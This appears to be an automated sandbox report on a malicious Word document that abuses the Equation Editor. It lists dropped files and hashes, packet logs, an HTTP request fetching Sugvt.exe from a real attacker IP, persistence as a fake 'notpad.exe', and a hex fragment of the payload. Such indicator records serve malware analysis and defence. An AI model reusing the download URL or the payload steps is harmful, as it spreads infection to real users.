                                                                SHA1:2A3C737FA1157E8483815E98B666408A18C0DB42
                                                                SHA-256:43536ADEF2DDCC811C28D35FA6CE3031029A2424AD393989DB36169FF2995083
                                                                SHA-512:45B56432244F86321FA88FBCCA6A0D2A2F7F4E0648C1D7D7B1866ADC9DAA5EDDD9F6BB73662149F279C9AB60930DAD1113C8337CB5E6EC9EED5048322F65F7D8
                                                                Malicious:false
                                                                Antivirus:
                                                                 • Antivirus: Metadefender, Detection: 0%
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                C:\ProgramData\sqlite3.dll
                                                                Process:C:\Users\user\AppData\Local\Temp\toqqx.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):645592
                                                                Entropy (8bit):6.50414583238337
                                                                Encrypted:false
                                                                SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                Malicious:false
                                                                Antivirus:
                                                                 • Antivirus: Metadefender, Detection: 0%
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                C:\ProgramData\vcruntime140.dll
                                                                Process:C:\Users\user\AppData\Local\Temp\toqqx.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):83784
                                                                Entropy (8bit):6.890347360270656
                                                                Encrypted:false
                                                                SSDEEP:1536:AQXQNgAuCDeHFtg3uYQkDqiVsv39niI35kU2yecbVKHHwhbfugbZyk:AQXQNVDeHFtO5d/A39ie6yecbVKHHwJF
                                                                MD5:7587BF9CB4147022CD5681B015183046
                                                                SHA1:F2106306A8F6F0DA5AFB7FC765CFA0757AD5A628
                                                                SHA-256:C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
                                                                SHA-512:0B63E4979846CEBA1B1ED8470432EA6AA18CCA66B5F5322D17B14BC0DFA4B2EE09CA300A016E16A01DB5123E4E022820698F46D9BAD1078BD24675B4B181E91F
                                                                Malicious:false
                                                                Antivirus:
                                                                 • Antivirus: Metadefender, Detection: 0%
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\Sugvt[1].exe
                                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:downloaded
                                                                Size (bytes):251192
                                                                Entropy (8bit):7.78065991811089
                                                                Encrypted:false
                                                                SSDEEP:3072:voiswQNk+vZJKZ0Hx7hA0qstfzoeAWRfS8ypYAxBWA3VcuVdxtWL1ySDMIeKppKe:gRV4QpZvtfUeAIQHuA36cdHj2O6K0Xw
                                                                MD5:5753388FBFCDE9E08D00AC9E2BE5D881
                                                                SHA1:48E8A88CA75782489DB9B5DA0DFF11F050A7A4E0
                                                                SHA-256:D346665DC0A3C37256F313F6E9E41C254ACF70C599D007F1391128C4B3771CE6
                                                                SHA-512:483BFD819158B38E996780C3D59EE22B3A3D372D1CD38BFA68DC817370663DA0978F259C836DF42F5C2F5E3FD7EE9217D7F185664678C575C24A2F131226BAD7
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 47%
                                                                IE Cache URL:http://31.210.20.6/3/Sugvt.exe
                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4C112D4.png
                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                File Type:PNG image data, 288 x 424, 8-bit/color RGBA, non-interlaced
                                                                Category:dropped
                                                                Size (bytes):84949
                                                                Entropy (8bit):7.992825260372582
                                                                Encrypted:true
                                                                SSDEEP:1536:JPs/c63J2lk4Gjh3mkGaWqOJcJ8BsjTxfNbQ2ds7WQGBJeDSl:JPMtIlkdjh2kJWgjpf1b/eDI
                                                                MD5:23A2AF973BBF6CC30633EB218EF11067
                                                                SHA1:69E4BB8450F096694A026CA859498AE30D3FB1FB
                                                                SHA-256:1AD903E11D4A00E9AF3A24E5F92A71295A693945CC3BBF894D6176BA831445C4
                                                                SHA-512:85376D9C5A4B688E781938F11AE3CBB592F86C4593B7BCC8E74EE32ECEB0FF374A17B5DFFD8E3ECA0498420AB07F04A75423992416B33BE59EA35836671BB838
                                                                Malicious:false
                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B4C77723-97C0-4A14-814E-1968BCE52029}.tmp
                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):1024
                                                                Entropy (8bit):0.05390218305374581
                                                                Encrypted:false
                                                                SSDEEP:3:ol3lYdn:4Wn
                                                                MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                Malicious:false
                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{FDB545E2-A1F4-4D0B-BC71-CA4D3862B689}.tmp
                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                File Type:Targa image data - RLE 65536 x 65536 x 0 ""
                                                                Category:dropped
                                                                Size (bytes):2560
                                                                Entropy (8bit):0.41457256320776753
                                                                Encrypted:false
                                                                SSDEEP:3:ylYdltn/lL6VVg7NNKlqlURDkC4Rlc1pK/lVlJl/FAY/ldzNBBllqPxZlhQtChj:13MVKpAlq+YHlcTK/0Yz0PxZUta
                                                                MD5:97D70616A654FEB5A6CEE5B01A432322
                                                                SHA1:2DBEA561E55077EF2723753349B8946BE60ADAB5
                                                                SHA-256:91C46782F089DA12A9AA47E3C310AB89C4096F8D06739CA88126CBEC17C09929
                                                                SHA-512:21285582F5AC8BE927BDA53299469D724B691EF303329D1C5F555DFD9D1F2343BB81A3E4B1738765F4AF07A4371B783E8BF9352236E6488A885B608801716B1B
                                                                Malicious:false
                                                                C:\Users\user\AppData\Local\Temp\toqqx.exe
                                                                Process:C:\Users\user\toqqx.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):251192
                                                                Entropy (8bit):7.78065991811089
                                                                Encrypted:false
                                                                SSDEEP:3072:voiswQNk+vZJKZ0Hx7hA0qstfzoeAWRfS8ypYAxBWA3VcuVdxtWL1ySDMIeKppKe:gRV4QpZvtfUeAIQHuA36cdHj2O6K0Xw
                                                                MD5:5753388FBFCDE9E08D00AC9E2BE5D881
                                                                SHA1:48E8A88CA75782489DB9B5DA0DFF11F050A7A4E0
                                                                SHA-256:D346665DC0A3C37256F313F6E9E41C254ACF70C599D007F1391128C4B3771CE6
                                                                SHA-512:483BFD819158B38E996780C3D59EE22B3A3D372D1CD38BFA68DC817370663DA0978F259C836DF42F5C2F5E3FD7EE9217D7F185664678C575C24A2F131226BAD7
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 47%
                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\PL_503_13_570.LNK
                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Wed Aug 26 14:08:15 2020, atime=Wed May 5 03:33:33 2021, length=96745, window=hide
                                                                Category:dropped
                                                                Size (bytes):2068
                                                                Entropy (8bit):4.5238401563505155
                                                                Encrypted:false
                                                                SSDEEP:48:8W/XT0jFxhvjytv+Qh2W/XT0jFxhvjytv+Q/:8W/XojFxhvetv+Qh2W/XojFxhvetv+Q/
                                                                MD5:5232E49EC240FE9965EABF74911D0C3E
                                                                SHA1:C6B13BDFD7E8CDE5BB38E121ED102AAC02A38D21
                                                                SHA-256:27692E721D72C8E230FEA5EDA37E344EEBD3CCC679D6FA443CF7ED0AFB466838
                                                                SHA-512:D3CED6E1A9FDDEB621FCC7D7C193448FEBDEB18E777F1F391B9A65877253F1E52824A9265CD248845095ED7A7C5F642D5680C7E70F4EC2575233F13327E99328
                                                                Malicious:false
                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):79
                                                                Entropy (8bit):4.125407729152288
                                                                Encrypted:false
                                                                SSDEEP:3:H+UTWWVdrultJAWWVdrulmxW+UTWWVdrulv:HVjpEJAjpujpc
                                                                MD5:E2DDBD406167EFBA76CDD5993E8BA39B
                                                                SHA1:26C3D0CC660821981ABB73AF70FCA21350F41BA4
                                                                SHA-256:AF0B1925B6C9A942B992164D588D81C1CEC281626527C8636F58E15A75EA7691
                                                                SHA-512:FA071A7A4FDEA7D3D962717297B73B9045E1646DB9083197CA7CF04C378CCCAD3AB4178353AE2939CAC3066C52B41C0386E9FDB68D55286D464B1124D7021DFD
                                                                Malicious:false
                                                                Preview: [misc]..PL_503_13_570.LNK=0..PL_503_13_570.LNK=0..[misc]..PL_503_13_570.LNK=0..
                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):162
                                                                Entropy (8bit):2.431160061181642
                                                                Encrypted:false
                                                                SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                                                MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                                                SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                                                SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                                                SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                                                Malicious:false
                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\notpad\notpad.exe
                                                                Process:C:\Users\user\toqqx.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):251192
                                                                Entropy (8bit):7.78065991811089
                                                                Encrypted:false
                                                                SSDEEP:3072:voiswQNk+vZJKZ0Hx7hA0qstfzoeAWRfS8ypYAxBWA3VcuVdxtWL1ySDMIeKppKe:gRV4QpZvtfUeAIQHuA36cdHj2O6K0Xw
                                                                MD5:5753388FBFCDE9E08D00AC9E2BE5D881
                                                                SHA1:48E8A88CA75782489DB9B5DA0DFF11F050A7A4E0
                                                                SHA-256:D346665DC0A3C37256F313F6E9E41C254ACF70C599D007F1391128C4B3771CE6
                                                                SHA-512:483BFD819158B38E996780C3D59EE22B3A3D372D1CD38BFA68DC817370663DA0978F259C836DF42F5C2F5E3FD7EE9217D7F185664678C575C24A2F131226BAD7
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 47%
                                                                C:\Users\user\Desktop\~$_503_13_570.docx
                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):162
                                                                Entropy (8bit):2.431160061181642
                                                                Encrypted:false
                                                                SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                                                MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                                                SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                                                SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                                                SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                                                Malicious:false
                                                                C:\Users\user\toqqx.exe
                                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):251192
                                                                Entropy (8bit):7.78065991811089
                                                                Encrypted:false
                                                                SSDEEP:3072:voiswQNk+vZJKZ0Hx7hA0qstfzoeAWRfS8ypYAxBWA3VcuVdxtWL1ySDMIeKppKe:gRV4QpZvtfUeAIQHuA36cdHj2O6K0Xw
                                                                MD5:5753388FBFCDE9E08D00AC9E2BE5D881
                                                                SHA1:48E8A88CA75782489DB9B5DA0DFF11F050A7A4E0
                                                                SHA-256:D346665DC0A3C37256F313F6E9E41C254ACF70C599D007F1391128C4B3771CE6
                                                                SHA-512:483BFD819158B38E996780C3D59EE22B3A3D372D1CD38BFA68DC817370663DA0978F259C836DF42F5C2F5E3FD7EE9217D7F185664678C575C24A2F131226BAD7
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 47%

                                                                Static File Info

                                                                General

                                                                File type:Microsoft Word 2007+
                                                                Entropy (8bit):7.990455579948406
                                                                TrID:
                                                                • Word Microsoft Office Open XML Format document (49504/1) 49.01%
                                                                • Word Microsoft Office Open XML Format document (43504/1) 43.07%
                                                                • ZIP compressed archive (8000/1) 7.92%
                                                                File name:PL_503_13_570.docx
                                                                File size:96745
                                                                MD5:158e499db47d9c6a56449c86f3b1596f
                                                                SHA1:6d0e9274649112ec7e9a757168b7de6eb2c48ff2
                                                                SHA256:5e7fe9a4eb6dc098b6ed28b083d277455d66a515e7c78b270ad0515a90279f45
                                                                SHA512:f5bac985860f4c9ed7f8191cf28c223eea6676fa7dcac71a930a1e49ea6b6b3c41eb1c22f64119830c3374c889bd66cdb1b20af16312d8832c09ec59e2a72956
                                                                SSDEEP:1536:jQUWNY6UPs/c63J2lk4Gjh3mkGaWIpOJcJ8BsjTxfNbQxds7WQGBJeDS8:jQJG6UPMtIlkdjh2kJWgjpfmb/eDz

                                                                File Icon

                                                                Icon Hash:e4e6a2a2a4b4b4a4

                                                                Static OLE Info

                                                                General

                                                                Document Type:OpenXML
                                                                Number of OLE Files:1

                                                                OLE File "/opt/package/joesandbox/database/analysis/404284/sample/PL_503_13_570.docx"

                                                                Indicators

                                                                Has Summary Info:False
                                                                Application Name:unknown
                                                                Encrypted Document:False
                                                                Contains Word Document Stream:
                                                                Contains Workbook/Book Stream:
                                                                Contains PowerPoint Document Stream:
                                                                Contains Visio Document Stream:
                                                                Contains ObjectPool Stream:
                                                                Flash Objects Count:
                                                                Contains VBA Macros:False

                                                                Summary

                                                                Title:
                                                                Subject:
                                                                Author:Dell
                                                                Keywords:
                                                                Template:Normal.dotm
                                                                Last Saved By:Dell
                                                                Revision Number:1
                                                                Total Edit Time:1
                                                                Create Time:2021-04-28T13:50:00Z
                                                                Last Saved Time:2021-04-28T13:51:00Z
                                                                Number of Pages:1
                                                                Number of Words:0
                                                                Number of Characters:0
                                                                Creating Application:Microsoft Office Word
                                                                Security:0

                                                                Document Summary

                                                                Number of Lines:0
                                                                Number of Paragraphs:0
                                                                Thumbnail Scaling Desired:false
                                                                Company:
                                                                Contains Dirty Links:false
                                                                Shared Document:false
                                                                Changed Hyperlinks:false
                                                                Application Version:15.0000

                                                                Streams

                                                                Stream Path: EQUAtIoN nativE, File Type: data, Stream Size: 1937
                                                                General
                                                                Stream Path:EQUAtIoN nativE
                                                                File Type:data
                                                                Stream Size:1937
                                                                Entropy:7.188644563
                                                                Base64 Encoded:False

                                                                Network Behavior

                                                                Network Port Distribution

                                                                TCP Packets

                                                                Timestamp                            Source Port  Dest Port  Source IP      Dest IP
                                                                May 4, 2021 21:34:09.161539078 CEST  49165        80         192.168.2.22   31.210.20.6
                                                                May 4, 2021 21:34:09.212819099 CEST  80           49165      31.210.20.6    192.168.2.22
                                                                May 4, 2021 21:34:09.212904930 CEST  49165        80         192.168.2.22   31.210.20.6
                                                                May 4, 2021 21:34:09.213181973 CEST  49165        80         192.168.2.22   31.210.20.6
                                                                May 4, 2021 21:34:09.261564970 CEST  80           49165      31.210.20.6    192.168.2.22
                                                                May 4, 2021 21:34:09.262763977 CEST  80           49165      31.210.20.6    192.168.2.22
                                                                May 4, 2021 21:34:09.262790918 CEST  80           49165      31.210.20.6    192.168.2.22
                                                                May 4, 2021 21:34:09.262804031 CEST  80           49165      31.210.20.6    192.168.2.22
                                                                May 4, 2021 21:34:09.262821913 CEST  80           49165      31.210.20.6    192.168.2.22
                                                                May 4, 2021 21:34:09.262834072 CEST  80           49165      31.210.20.6    192.168.2.22
                                                                May 4, 2021 21:34:09.262846947 CEST  49165        80         192.168.2.22   31.210.20.6
                                                                May 4, 2021 21:34:09.262851000 CEST  80           49165      31.210.20.6    192.168.2.22
                                                                May 4, 2021 21:34:09.262867928 CEST  80           49165      31.210.20.6    192.168.2.22
                                                                May 4, 2021 21:34:09.262873888 CEST  49165        80         192.168.2.22   31.210.20.6
                                                                May 4, 2021 21:34:09.262876987 CEST  49165        80         192.168.2.22   31.210.20.6
                                                                May 4, 2021 21:34:09.262883902 CEST  80           49165      31.210.20.6    192.168.2.22
                                                                May 4, 2021 21:34:09.262909889 CEST  49165        80         192.168.2.22   31.210.20.6
                                                                May 4, 2021 21:34:09.262913942 CEST  49165        80         192.168.2.22   31.210.20.6
                                                                May 4, 2021 21:34:09.262917042 CEST  80           49165      31.210.20.6    192.168.2.22
                                                                May 4, 2021 21:34:09.262919903 CEST  49165        80         192.168.2.22   31.210.20.6
                                                                May 4, 2021 21:34:09.262933969 CEST  80           49165      31.210.20.6    192.168.2.22
                                                                May 4, 2021 21:34:09.262959003 CEST  49165        80         192.168.2.22   31.210.20.6
                                                                May 4, 2021 21:34:09.262972116 CEST  49165        80         192.168.2.22   31.210.20.6
                                                                May 4, 2021 21:34:09.272619009 CEST  49165        80         192.168.2.22   31.210.20.6
                                                                May 4, 2021 21:34:09.311681986 CEST  80           49165      31.210.20.6    192.168.2.22
                                                                May 4, 2021 21:34:09.311708927 CEST  80           49165      31.210.20.6    192.168.2.22
                                                                May 4, 2021 21:34:09.311726093 CEST  80           49165      31.210.20.6    192.168.2.22
                                                                May 4, 2021 21:34:09.311743021 CEST  80           49165      31.210.20.6    192.168.2.22
                                                                May 4, 2021 21:34:09.311748981 CEST  49165        80         192.168.2.22   31.210.20.6
                                                                May 4, 2021 21:34:09.311758041 CEST  80           49165      31.210.20.6    192.168.2.22
                                                                May 4, 2021 21:34:09.311774015 CEST  80           49165      31.210.20.6    192.168.2.22
                                                                May 4, 2021 21:34:09.311774015 CEST  49165        80         192.168.2.22   31.210.20.6
                                                                May 4, 2021 21:34:09.311779022 CEST4916580192.168.2.2231.210.20.6
                                                                May 4, 2021 21:34:09.311781883 CEST4916580192.168.2.2231.210.20.6
                                                                May 4, 2021 21:34:09.311789989 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.311806917 CEST4916580192.168.2.2231.210.20.6
                                                                May 4, 2021 21:34:09.311814070 CEST4916580192.168.2.2231.210.20.6
                                                                May 4, 2021 21:34:09.311821938 CEST4916580192.168.2.2231.210.20.6
                                                                May 4, 2021 21:34:09.311831951 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.311847925 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.311861038 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.311872959 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.311902046 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.311917067 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.311933994 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.311950922 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.311950922 CEST4916580192.168.2.2231.210.20.6
                                                                May 4, 2021 21:34:09.311968088 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.311978102 CEST4916580192.168.2.2231.210.20.6
                                                                May 4, 2021 21:34:09.311981916 CEST4916580192.168.2.2231.210.20.6
                                                                May 4, 2021 21:34:09.311986923 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.311996937 CEST4916580192.168.2.2231.210.20.6
                                                                May 4, 2021 21:34:09.312005043 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.312005997 CEST4916580192.168.2.2231.210.20.6
                                                                May 4, 2021 21:34:09.312021017 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.312022924 CEST4916580192.168.2.2231.210.20.6
                                                                May 4, 2021 21:34:09.312037945 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.312045097 CEST4916580192.168.2.2231.210.20.6
                                                                May 4, 2021 21:34:09.312072039 CEST4916580192.168.2.2231.210.20.6
                                                                May 4, 2021 21:34:09.313113928 CEST4916580192.168.2.2231.210.20.6
                                                                May 4, 2021 21:34:09.313138008 CEST4916580192.168.2.2231.210.20.6
                                                                May 4, 2021 21:34:09.360677958 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.360702991 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.360718966 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.360734940 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.360754013 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.360769987 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.360786915 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.360805988 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.360822916 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.360838890 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.360855103 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.360872030 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.360873938 CEST4916580192.168.2.2231.210.20.6
                                                                May 4, 2021 21:34:09.360888958 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.360903025 CEST4916580192.168.2.2231.210.20.6
                                                                May 4, 2021 21:34:09.360908985 CEST4916580192.168.2.2231.210.20.6
                                                                May 4, 2021 21:34:09.360925913 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.360944986 CEST4916580192.168.2.2231.210.20.6
                                                                May 4, 2021 21:34:09.360970974 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.360979080 CEST4916580192.168.2.2231.210.20.6
                                                                May 4, 2021 21:34:09.361008883 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.361023903 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.361035109 CEST4916580192.168.2.2231.210.20.6
                                                                May 4, 2021 21:34:09.361048937 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.361064911 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.361073971 CEST4916580192.168.2.2231.210.20.6
                                                                May 4, 2021 21:34:09.361080885 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.361098051 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.361110926 CEST4916580192.168.2.2231.210.20.6
                                                                May 4, 2021 21:34:09.361115932 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.361130953 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.361139059 CEST4916580192.168.2.2231.210.20.6
                                                                May 4, 2021 21:34:09.361150026 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.361167908 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.361170053 CEST4916580192.168.2.2231.210.20.6
                                                                May 4, 2021 21:34:09.361183882 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.361200094 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.361206055 CEST4916580192.168.2.2231.210.20.6
                                                                May 4, 2021 21:34:09.361216068 CEST804916531.210.20.6192.168.2.22

HTTP Request Dependency Graph

• 31.210.20.6
• 198.98.60.43

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49165 | 31.210.20.6 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Timestamp | kBytes transferred | Direction | Data
May 4, 2021 21:34:09.213181973 CEST | 0 | OUT | GET /3/Sugvt.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 31.210.20.6
Connection: Keep-Alive
May 4, 2021 21:34:09.262763977 CEST | 1 | IN | HTTP/1.1 200 OK
Date: Tue, 04 May 2021 19:34:09 GMT
Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24
Last-Modified: Tue, 04 May 2021 09:17:04 GMT
ETag: "3d538-5c17d8a9a6400"
Accept-Ranges: bytes
Content-Length: 251192
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream
                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 29 12 91 60 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 6a 03 00 00 4a 00 00 00 00 00 00 ce 89 03 00 00 20 00 00 00 a0 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 74 89 03 00 57 00 00 00 00 a0 03 00 2c 47 00 00 00 00 00 00 00 00 00 00 00 b6 03 00 38 1f 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d4 69 03 00 00 20 00 00 00 6a 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 2c 47 00 00 00 a0 03 00 00 48 00 00 00 6c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 04 00 00 02 00 00 00 b4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 89 03 00 00 00 00 00 48 00 00 00 02 00 05 00 b0 63 03 00 c4 25 00 00 03 00 00 00 57 00 00 06 30 46 00 00 80 1d 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 30 09 00 2e 00 00 00 00 00 00 00 02 28 16 00 00 0a 02 03 19 2d 14 26 26 02 28 17 00 00 0a 6f 18 00 00 0a 15 2d 0b 26 26 2b 0e 7d 01 00 00 04 2b e7 
